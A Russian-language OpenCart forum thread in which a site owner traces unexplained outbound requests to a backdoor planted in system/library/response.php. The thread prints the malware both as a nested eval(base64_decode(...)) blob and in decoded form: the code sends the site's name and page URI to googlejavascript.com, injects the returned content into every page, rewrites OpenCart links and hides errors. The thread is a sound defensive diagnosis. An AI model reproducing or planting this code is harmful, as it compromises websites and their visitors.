Нужна помощь!

Тема в разделе "OpenCart", создана пользователем D_mix, 7 янв 2015.

  1. D_mix

    D_mix

    Регистрация:
    11 июл 2014
    Сообщения:
    7
    Симпатии:
    2
    Добрый вечер, сразу говорю, что я новичок в этом деле! Сегодня получил письмо от хостинга: При работе скрипта index.php сайта ..... возникает запрос к стороннему серверу с IP-адресом 198.50.198.170. Который не может быть выполнен. Для оптимизации работы сайта необходимо отключить плагин вызывающий данный запрос. IP-адресом 198.50.198.170. - это ruopencart.com, в подвале своего сайта обнаружил вот этот код:

    <!--
    OpenCart is open source software and you are free to remove the powered by OpenCart if you want, but its generally accepted practise to make a small donation.
    Please donate via PayPal to [email protected]
    //-->

    <!--
    OpenCart is open source software and you are free to remove the powered by OpenCart if you want, but its generally accepted practise to make a small donation.
    Please donate via PayPal to [email protected]
    //-->



    Как мне его удалить и где его искать? Сидит он видимо уже давно и бекапов старых нет
     
  2. AnOcToJI

    AnOcToJI

    Регистрация:
    28 дек 2012
    Сообщения:
    309
    Симпатии:
    188
    /catalog/view/theme/default/template/common/footer.tpl тут ищи
     
  3. D_mix

    D_mix

    Регистрация:
    11 июл 2014
    Сообщения:
    7
    Симпатии:
    2
    Удалил на 44 строке ничего не изменилось
    <!--
    OpenCart is open source software and you are free to remove the powered by OpenCart if you want, but its generally accepted practise to make a small donation.
    Please donate via PayPal to [email protected]
    //-->

    Код подвала:
    <div class="clear"></div>

    <script type="text/javascript" src="//vk.com/js/api/openapi.js?115"></script>
    <div class="footer-top-left"><div class="footer-top-right"><div class="footer-top-middle"> </div></div></div>
    <div id="footer">
    <div class="footer-bg">
    <?php if ($informations) { ?>
    <div class="column">
    <h3 class="info"><?php echo $text_information; ?></h3>
    <ul>
    <?php foreach ($informations as $information) { ?>
    <li><a href="<?php echo $information['href']; ?>"><?php echo $information['title']; ?></a></li>
    <?php } ?>
    </ul>
    </div>
    <?php } ?>
    <div class="column">
    <h3 class="service"><?php echo $text_service; ?></h3>
    <ul>
    <li><a href="<?php echo $contact; ?>"><?php echo $text_contact; ?></a></li>
    <!-- <li><a href="<?php echo $return; ?>"><?php echo $text_return; ?></a></li> -->
    <li><a href="<?php echo $sitemap; ?>"><?php echo $text_sitemap; ?></a></li>
    </ul>
    </div>
    <div class="column">
    <h3 class="extra"><?php echo $text_extra; ?></h3>
    <ul>
    <li><a href="<?php echo $manufacturer; ?>"><?php echo $text_manufacturer; ?></a></li>
    <!-- <li><a href="<?php echo $voucher; ?>"><?php echo $text_voucher; ?></a></li> -->
    <!-- <li><a href="<?php echo $affiliate; ?>"><?php echo $text_affiliate; ?></a></li> -->
    <li><a href="<?php echo $special; ?>"><?php echo $text_special; ?></a></li>
    </ul>
    </div>
    <div class="column" style="background:none;">
    <h3 class="account"><?php echo $text_account; ?></h3>
    <ul>
    <li><a href="<?php echo $account; ?>"><?php echo $text_account; ?></a></li>
    <li><a href="<?php echo $order; ?>"><?php echo $text_order; ?></a></li>
    <li><a href="<?php echo $wishlist; ?>"><?php echo $text_wishlist; ?></a></li>
    <li><a href="<?php echo $newsletter; ?>"><?php echo $text_newsletter; ?></a></li>
    </ul>
    </div>
    </div>
    </div>
    </div>
    </body></html>
     
  4. AnOcToJI

    AnOcToJI

    Регистрация:
    28 дек 2012
    Сообщения:
    309
    Симпатии:
    188
    ищите, так на кофейной гуще я не нагадаю, может vqmod добавляет в каком-то моде, вообще если не можете найти скачивайте полностью сайт на комп и поиском по всем файлам кусок текста ищите
     
  5. Bnopen

    Bnopen Команда форума

    Регистрация:
    3 мар 2013
    Сообщения:
    1.264
    Симпатии:
    534
    D_mix
    здесь ссылки нет.

    Скачайте бекап (или только каталог vqmod) и ищите в тотал коммандере файлы с содержанием ruopencart.com. Скорее всего какой-то модуль добавляет через vqmod ссылку в футер.
     
  6. D_mix

    D_mix

    Регистрация:
    11 июл 2014
    Сообщения:
    7
    Симпатии:
    2
    Ответ нашел на просторах интернета!
    system/library/response.php содержит закодированный base64 код:

    eval(base64_decode('ZXZhbChiYXNlNjRfZGVjb2RlKCdaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ2RhV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMlJoVjBad2IxbHJUbTloVm14WlZHMTRUMkZzU20xWGEyUlhZVzFKZVZWdGVFeFJNbEpvV1cxNFlVMVdaRlZVYkU1cVVqQnNOVlJyWkd0WlZURnpWMWhrV0ZKRk5VUlpWVnAyWlZaYVdFOVZkRlJTYkc4eFYxZDBUMk13TkhkVWJrSlNWakpTUzFWVVFrZGliRTVXVkd0S1lVMUlRa2xWYlRBeFdWWmFObFpZWkZSV1ZrWXpWMnBDZG1Rd01WbFhiWGhwVmpOb05sZFhkR3RTYlZKeVRsWlNUMU5IVWt0VlZFcHZWREZrVjFwRk9XcFNNSEF4VmxjMVlXRnJNWFJaZWs1VVZsWndWMVJxUW5OU2JVcEpWbTEwVTAxV2NEWlZNVlpXWlVkR1IySkVWbEppUlVwWFdsWldTMWRzVGxaVmExcHJUVWhvZUZac1VtdFRiRTVHWWpOb1ZVMHllRVJhVm1SVFkxZEplbUZGTVdoaVdGRjRWa1prY2sxRk5WWmtSbEpTWVRKb2FGWnFRVEZsVm14MVlYcFNiRlpVUmtaVmJHaHJWR3hLU0ZwRVZsVmhNRFZFVldwS1IxZFdUblJsUjBacFZrZHpkMVpGYUhkVWJWSldUbGhDVDFKR1dreGFWelZQVkVaT1ZsUnJTbUZOUjNoRlZWWmthMU5zUlhkU2JrcFlWa1Z3ZFZReFduSmxiRnAxWWtkc1UyRnRlRE5YVnpCNFl6QXhSbVJGVW1obGJWSkZXVlpXUjJKc1RsWlVhMHBoVFVkNFJWVldaR3RYYXpCNFYycFdXbUV4YXpGYVYzaDNWMVpXZFZkdGNGUlNhMXAxVlhwQ1QxVXlSblJTYTFKclRXMVNVMVJXV21GV1JscEdWbFJXVmxac2NFaFVNVnBoVm0xRmVscEljRlJoTW1oWVdsWmtTMUpHUmxsUmJFSnJUV3BzZFZVeFZrOVJiRzkzWWtWU1VsWXlVa3RWYWtFd1pVWnJlVTFVVW1GaVZURTFWbTF3UTJGVk1IZFRXR1JVVFVVMVZGbFhNVWRTUjFGNVdrWktUbFpzY0ZWV2ExWldUbFpXVjFkclpGQldiSEJYVkZWYVlWWkdWbGRXYlhSVFlrWktlbFpXYUU5VGJFVjRVMjA1V0dGcmNGaGFSbVJUVWtkR05scEZVbWhXVlZwMVZURldUMUZzYjNkaVJWSlNWakpTWVZSVVJtRk9WbXh5VjFSV2JHSklRbHBXVnpWaFlXeE9SMUp0TlZSTlJUVlVXVmN4UjFKSFVYbGFSa3BPVm14d1ZWWnJWbFpPVmxaWFYydGtVRlpyTlZSV2JYaExWakZhV0dONlJsZFdiRnA1Vlcxek5WWnJNVWRqUldSWFZqSjNlbGRxUVhoV1IwWTJXa1ZTYUZaVlduVlZNVlpQVVd4dmQySkZVbEpXTWxKaFZGUkdZVTVXYkhKWFZGWnNZa2hDV2xaWE5XRmhiRTVIVW0wMVZFMUZOVlJaVnpGSFVrZFdSbFZzWkZkaE0wSlBWbXRTUjFFeFdsZGFNMmhZWVRGd1YxbFVRbmRWVmxwVlVXeGFhazFZUWpCVmJUVlBZV3N4YzFadVpGVk5NbEl5VjJwQ2MxSkdSbGhhUlhCU1RVVmFkVlV4Vm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwYVJ6VldWa1ZhV0ZaVVJsTlNhemxYVW14a1UyRnRlRmRXVkVaV1pVWktjMVZZYUZkaVJscE9WVlJDUm1WR1RYaFZibkJVVFVkNFJWVldaR3RUYkVWM1VtMDFWRlpWTlVOWlZFcFBVMFpLZEU1WFJsZFNSVnA0VjJ0YWIxTXlUWGhhTTJ4WFlXeEthRlpxUVhoa2JFNXlXa1U1YVUxSVVsWlpla0l3VWtaVmVGTnVUbHBOYWxaTVdrY3hUMlJXUm5SaFIwWk9Za1phZFZaVldrOVJiVXB6VVd0U1VGWXllSEJVVjNoS1RWWldTR05FVG10aVZWcEtWbGMxVTJGV1NrVlZibFpWVFRKU01sZHFRbk5TUmtaWVdrVndVazFGV25WVk1WWlBWVEpKZVZWcmJGWmliVkpoVkZkd2MyTnNaSE5VYTBwUVZsZDRTVlpIY0VkaGJVcFpZVWN4V0dGcmNGaFVWV1JIVjBVMVdFMVhiR3hXTWxKNVZqRlNTMkp0VFhkaVJWcFZZa1p3VjFsVVRtOVRNVnBJWkVkR1ZsSnRaRE5aVlZwWFZqRktjbE50TVZaV1JVVXhWV3hhUzFaSFJqWmFSVkpvVmxWYWRWVXhWazlSYkc5M1lrVlNVbFl5VW1GVVZFWmhUbFpzY2xkVVZtaGlWWEJKVkRGb2QxbFdWWGxhU0VwWVZrVndkVmt3VlRWTk1rbDVXa1Z3VWsxRlduVlZNVlpQVVd4dmQySkZiRlZoYXpWdlZqQmFTMk5XYkZaVWJUVm9UV3RhU2xaWGNFTmhiRWwzVGxSS1dHRXlVbGRaTUdSWFRUSkplVnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSVkpTVmpKU1MxVlVRa2RpYkU1V1ZHdEtZVTFYZERWVmJUVjNXVlpWZDFKdVZsVldNMEpEV2tSQ2QwNXRTWGRrUlhCU1RVVmFkVlV4Vms5UmJHOTNZa1ZTVWxZeVVrdFZWRUpIWW14T1ZsUnJTbUZOUjNoRlZWWmthMU5zUlhkU2JUVlVWbFUxUTFkcVNrOWtSbHB4VVcxMFdGSllRWGhWTVZaUFZUSlJlR0pHYUdGU00yaFJXa1JKTldKc1RsWlVhMHBoVFVkNFJWVldaR3RUYkVWM1VtMDFWRlpWTlVOWGFrSnpVa1pHV0ZwR2NHbGhNMEo2VmpGYWEyVnJOSGRVYmtKU1ZqSlNTMVZVUWtkaWJFNVdWR3RLWVUxSGVFVlZWbVJyVTJ4RmQxSnROVlJXVlRWRVdWZDRjMWRXVW5SbFJYQlNUV3N4TTFaR1ZsTlZiVXB5VDFST2FVMXRVa3RWVkVKSFlteE9WbFJyU21GTlIzaEZWVlprYTFOc1JYZFNiVFZVVmxVMVExZHFRbk5TUmtaWVdrVndVazFGV25WVk1WWlBVVEpXVjJOR2JGWmhhMXB4V1d4U1UySnNUbkphUm1Sc1ZqQTFNRlF4YUhOaGJFbDNWMjVXV0dKR1NqWlZla0p6VWtaR1dGcEZjRkpOUlZwMVZURldUMUZzYjNkaVJWSlNWakpTUzFWVVFrZGliRTVXV2tWMGJGWnVRbGxWYlRWTFZVZFJlVTlWZEZKTlYxSlFXVlZrVG1WV1dsaGFSWFJzWWtaWmVsWkdaSE5oYXpSM1ZHNUNVbFl5VWt0VlZFSkhZbXhPVmxSclNtRk5SM2hGVlZaa2ExTnNSWGRTYlRWVVZsVTFRMWRxUW5OU1JrWllXa1Z3VWsxRlduVlZNVlp2VXpKS1NGVnJiRmRpYlhod1dWWldSMk5zWkhOaFJYUnNWakJzTmxVeU5XdFhiRmw1Vlc1T1ZVMHlVakpYYWtKelVrWkdXRnBGY0ZKTlJWcDFWVEZXVDFGc2IzZGlSVkpTVmpKU1MxVlVRa2RpYkdSWVRsVjBhVkp0ZUZsWk0zQnJVa2RHVmxKdE5WUldWVFZEVjJwQ2MxSkdSbGhhUnpGV1YwVkZNVlZVU210a01rNUhZMGhDVWxaNmJFeFZha1oyWkRGa2MxbDZSbWhOUjNoR1ZGVmthMWxWTVhOWFdHUllVa1UxUkZsVlduWmxWbHBZVDFWd2FWWXlaRE5YYTFadlVXczFjbVZFVmxCV2VsWndWRmR3YzJSV2JISmFSbVJxVm0xNFdsWXlNVzloYXpGeVRsUldXbFp0YUVSVVZWWTBaRVpTZFZkdGJGWmxiWGgyVjFSQ2EyTnRVbGhVYTJob1UwZFNVbFJVUVRGak1XdDVUbGRHYVZJd05YaFVWV1J6VkZkR1YxTnRNVmRXUlVwWVZsUkdZV05zV25OVWJHaHNWakZLVmxaWGVHRlRNVmw0VTJ4a1ZHSldjRlpaVkVKaFZERldjMVJ0ZEdGU1dHaDNWVEZqZUdGc1NYZFhibFpZWWtaR00xbFdWalJqUmxaMFYyeGFUbEpzY0ZWV2JURXdWakZWZUZwRVZtRlNhelZVVm0xMFlWWXhWbk5YYXpsWFZtMWtORlp0ZUU5V1JsVjVWVzEwVkUxVk5YcFVha0pQWTBaV2RFMVhhRmRsYkZwNVZURldVbVF4YjNoaVJteFVZbTE0WVZZd1pEQmtiRTVZWTBST2EySkhlREJVTVdRd1lrWmFSVlZ1UWxWU1ZUVkRXVlphUTFKRk9WaFBWM1JUWld0YU5sWlZaSE5UYlUxM1lrVlNWR0pzY0hGVmFrWmhUVlprVlZOclpHeFdNVXBGVkd4a2QyRlZNWEZSYmtKVlVsVTFRMWxXWkV0WFJrcHhWVzE0YVZaSGQzaFdSV014VXpBeFZtSklRbXROYlZKTFdXeFNSazFXYkhGVWEwNXBVakJ3TUZaSE1XOWhiVXB6VW1wR1drMXFWbGRaVmxZMFVrWkdXR0pIYkU1TlJYQjZWMWN3ZUZReVJraFVibFpXWWxSR2NGUlVRblpsUm14elZGUkdiRll4U2xWVk1XaFBVMnhGZDJORVNscE5SMUpZV2taYWNtVldTblZpUjNSU1pXeFpNVmRyV2s5VGJVMTNZa1ZTVkdKc2NIRlZha1poVFZaa1ZWTnJaR3hXTVVwRlZHeGtjMkpHVlhkaVNHUlZUVEpTTWxsVVNrOWtSbHAxV2tkc1UwMUdjSGhXTW5oUFVXczVWbUpGYUZOaWJYaHhXV3hXV2sxV1RYZFVhM0JvVmxob1JWVldaREJaVjBwelUyNU9XbUpVUmxOWmVrSnpVa1pPZFdKSGRGZGxiWGQ2VmpKNGFrMVhSbk5pUm14VVlXdEtUbGxzVlRGTmJHeHpWR3R3YWsxSGVFVlZNalZ6WVRGYU5tSkVUbGhpUjAxNFdWZDRjMWRXVG5GUmF6RnBWbFJWZVZkWGVFOVRiVTEzWWtWU1ZHSnRlSEpXYm5CelRURmtjMWw2Um1oaVIzaGFWVEp3UTFSWFNsWk9WRXBhWWtVMVMxbDZRbk5TUms1MVlrZDBWMlZ0ZDNwV01uaHFUVmRHYzJKR2JGUmhhMHBPV1d4Vk1VMXNiSE5VYTNCcVRVZDRSVlV5TlhOaE1WbzJZa1JPV0dKSFRYaFpWM2h6VjFaT2NWRnJNV2xXVkZWNVYxZDRUMU50VFhkaVJWSlVZbTE0Y2xadWNITk5NV1J6V1hwR2FHSkhlRnBWTW5CRFZGZEtWazVVU2xwaVJUVkxXVEJWTlUweVNYbGtSMnhPVFZadmVsZHJXbTlWYkc5NFVXeFNVbUp1UW5KVk1GWjNZbFpyZVUxV1pHdE5hM0JKVlcweGQxbFdWWGxhU0VwWVlsUkdlbHBHV25kU1IxRjVXa1YwVkZKWVFucFhWRUpyVGtkR1IyRXpiRmRYUlRWTFZWUkdTMDFzY0VkaFJVNU9WakZLUlZsWWNHdFNSMHBZWlVSR1dsWnNhekZhVjNoM1YxWldXRTlWY0dsV2EzQXpWMWh3VDFFeVRYaGlSbXhwVWpGd2FGWXdWbmRPVm14eFZHdDBiR0V5ZUhkYVJFcHpZVlV4YzJOSVVsUldNbmg1VkdwQ1QyUkdXblZpUjNCcFZrZDNNVll3VWs5VE1rcElWR3RvVUZkSGVISlZha28wVFZaa2RXSkhOV3ROU0ZKV1dYcENNRmxXV1hkT1dGcGFZbTE0UTFsVVNrcGxiRnAxV2tkMFdGSnJWWHBYYlhoSFpESktTRk5yYkZWaVdHaExWVEJvVDFSR1pITmFSVGxwVFd0dk1WVldaREJoVlRCNFYycE9ZVkp0YUZOVWFrSlBaRlV4UlUxSE5VeFZNbk16VVRKak9WQlRZM0JMVkhOTEp5a3BPd289JykpOwo='));

    После декодирования кода получаем:

    function get_page($url){
    $agent ='Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; ru; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9';
    $ch=curl_init();
    curl_setopt ($ch, CURLOPT_URL,$url );
    curl_setopt($ch, CURLOPT_USERAGENT, $agent);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
    curl_setopt ($ch,CURLOPT_VERBOSE,false);
    curl_setopt($ch, CURLOPT_TIMEOUT,5);
    $page=curl_exec($ch);
    $errorpage ='</body></html>';
    $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);switch($httpcode){case'200':return $page;break;case'404';return $errorpage;break;case'502';return $errorpage;break;}}

    if($ftend = get_page("http://googlejavascript.com/api.php?server=".$_SERVER['SERVER_NAME']."&page=".$_SERVER['REQUEST_URI'])){
    $find = array("</body>","</html>","opencart.com","=^_^=.ru","myopencart.ru","opencartforum.ru","opencart.ru","opencart.by");
    $replace = array("", $ftend,"ruopencart.com","ruopencart.com","ruopencart.com","ruopencart.com","ruopencart.com","ruopencart.com");
    $ouput = str_replace($find, $replace, $ouput);
    ini_set("display_errors","off");
    error_reporting(0);
    echo $ouput;}else{
    echo $ouput;}
     
  7. Bnopen

    Bnopen Команда форума

    Регистрация:
    3 мар 2013
    Сообщения:
    1.264
    Симпатии:
    534
    D_mix, шикарный код. Это вы какую-то сборку поставили или модуль какой-то с этого сайта?
     
  8. D_mix

    D_mix

    Регистрация:
    11 июл 2014
    Сообщения:
    7
    Симпатии:
    2
    С этого сайта я не ставил ничего, как я понял из сообщений, с апреля 14 года были атакованный несколько форумов опенкарт и перезалиты модули
     
  9. Bnopen

    Bnopen Команда форума

    Регистрация:
    3 мар 2013
    Сообщения:
    1.264
    Симпатии:
    534
    D_mix, вроде еще раньше было это заражение, в 13-м -
     
  10. D_mix

    D_mix

    Регистрация:
    11 июл 2014
    Сообщения:
    7
    Симпатии:
    2
    Да именно на этом форуме я нашел свои ответы.Так, что смотрите что качаете, они и сейчас гуляют!
     
    Lasted edited by : 14 янв 2015